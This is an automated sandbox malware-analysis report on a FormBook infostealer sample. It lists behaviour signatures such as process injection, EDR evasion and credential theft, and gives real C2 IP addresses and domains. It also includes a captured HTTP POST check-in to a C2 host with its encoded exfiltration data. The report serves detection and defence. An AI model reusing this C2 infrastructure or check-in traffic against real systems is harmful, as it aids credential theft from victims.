Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561747
MD5: df31a2ccd06e0f1075f7280d156f5237
SHA1: d2583bb274455234c26d299931edf04537bc76ef
SHA256: 2e64ed10f0c61a872dbc4cc8ac023e947db0c9642044dbe33af671cff97135a0
Tags: exe, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF31A2CCD06E0F1075F7280D156F5237)
    • file.exe (PID: 8148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF31A2CCD06E0F1075F7280D156F5237)
      • QmkRHPDwxbW.exe (PID: 5988 cmdline: "C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 6712 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • QmkRHPDwxbW.exe (PID: 4764 cmdline: "C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.file.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.file.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
                AV Detection

                Source: file.exe, ReversingLabs: Detection: 68%
                Source: file.exe, Virustotal: Detection: 37%
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exe, Joe Sandbox ML: detected
                Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QmkRHPDwxbW.exe, 00000005.00000002.3753745790.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3750502958.0000000000C4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.1502123475.00000000027B4000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.1504791007.0000000002962000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000005.00000002.3754091427.0000000000D68000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0241C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0241C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax7_2_02409E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h7_2_02E604D8

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49786 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49827 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49833 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49839 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49846 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49862 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49870 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49878 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49901 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49885 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49909 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49915 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49923 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49939 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49945 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49952 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49959 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 172.67.162.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50012 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50008 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50013 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50021 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50024 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50026 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50017 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50022 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50016 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50023 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50025 -> 68.66.226.92:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50027 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50018 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50019 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50020 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50028 -> 172.67.186.192:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50009 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50029 -> 172.67.186.192:80
                Source: DNS query: www.izmirescortg.xyz
                Source: Joe Sandbox View, IP Address: 199.59.243.227
                Source: Joe Sandbox View, IP Address: 154.23.184.95
                Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View, ASN Name: BODIS-NJUS
                Source: Joe Sandbox View, ASN Name: COGENT-174US
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.717hy.net
                Source: global trafficDNS traffic detected: DNS query: www.izmirescortg.xyz
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 196Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0Data Raw: 47 58 36 4c 70 32 46 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 70 49 74 44 71 45 58 72 42 4e 53 6b 33 6f 31 76 76 2b 43 4d 53 53 57 56 63 78 66 Data Ascii: GX6Lp2F=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXpItDqEXrBNSk3o1vv+CMSSWVcxf
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Sun, 24 Nov 2024 07:21:48 GMT | server: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | X-Frame-Options: SAMEORIGIN | Date: Sun, 24 Nov 2024 07:22:04 GMT | Connection: close | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | X-Frame-Options: SAMEORIGIN | Date: Sun, 24 Nov 2024 07:22:07 GMT | Connection: close | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | X-Frame-Options: SAMEORIGIN | Date: Sun, 24 Nov 2024 07:22:10 GMT | Connection: close | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | X-Frame-Options: SAMEORIGIN | Date: Sun, 24 Nov 2024 07:22:12 GMT | Connection: close | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:22:20 GMT | server: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:22:23 GMT | server: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:22:25 GMT | server: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sun, 24 Nov 2024 07:22:28 GMT | server: LiteSpeed
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 24 Nov 2024 07:22:36 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 24 Nov 2024 07:22:38 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 24 Nov 2024 07:22:41 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 24 Nov 2024 07:22:44 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a5f968-94"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.1.29 | cache-control: no-cache, private | content-type: text/html; charset=UTF-8 | content-length: 1992 | content-encoding: br | vary: Accept-Encoding | date: Sun, 24 Nov 2024 07:22:51 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 1992
                content-encoding: br
                vary: Accept-Encoding
                date: Sun, 24 Nov 2024 07:22:53 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 1992
                content-encoding: br
                vary: Accept-Encoding
                date: Sun, 24 Nov 2024 07:22:56 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/8.1.29
                cache-control: no-cache, private
                content-type: text/html; charset=UTF-8
                content-length: 6603
                date: Sun, 24 Nov 2024 07:22:59 GMT
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Sun, 24 Nov 2024 07:23:56 GMT
                server: LiteSpeed
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Sun, 24 Nov 2024 07:23:59 GMT
                server: LiteSpeed
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Sun, 24 Nov 2024 07:24:01 GMT
                server: LiteSpeed
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Sun, 24 Nov 2024 07:24:04 GMT
                server: LiteSpeed
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Sun, 24 Nov 2024 07:24:11 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Sun, 24 Nov 2024 07:24:14 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Sun, 24 Nov 2024 07:24:16 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Sun, 24 Nov 2024 07:24:19 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Sun, 24 Nov 2024 07:24:41 GMT
                Server: Apache
                Content-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Sun, 24 Nov 2024 07:24:44 GMT
                Server: Apache
                Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sun, 24 Nov 2024 07:24:47 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
